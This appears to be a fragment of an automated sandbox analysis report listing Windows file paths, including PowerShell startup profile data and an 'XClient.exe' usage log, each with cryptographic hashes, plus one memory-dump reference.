C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d335b933fd5902cc5d6e6f5cfae33b57
SHA1 30511e75e9f4d4b09ddbeb2b6adeb5cd89defd87
SHA256 c1e38b772837438d10218009be55d7b2098daa5ba708708836f56a7e99024dc1
SHA512 4839b6be9877bb1a64d387df0f93b40859e48a5b6e7d2fb5fd92a057b1973916b93727b4dca9f1819038da65fd4548afb7f0c414a82e388e714dde6e6ccb4266

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9a0c0a8d1f8f450b3623a60721b4eb28
SHA1 462bf53afba0d96f3c5a528e8a5f9e3d40083b24
SHA256 e81c53eaaee036b0a54daf828e5268973ff71477c84f9248ed904f4d6cd92902
SHA512 82848da2dc54602d048958819b5083582cecee502f33656706e708c168a0abc854e1e9b57865e754f41d678ec662ac681ef61b4dfd8ca255f48bc9bc1aeea818

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 15dde0683cd1ca19785d7262f554ba93
SHA1 d039c577e438546d10ac64837b05da480d06bf69
SHA256 d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA512 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ce4540390cc4841c8973eb5a3e9f4f7d
SHA1 2293f30a6f4c9538bc5b06606c10a50ab4ecef8e
SHA256 e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105
SHA512 2a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/1700-1128-0x0000000000310000-0x0000000000320000-memory.dmp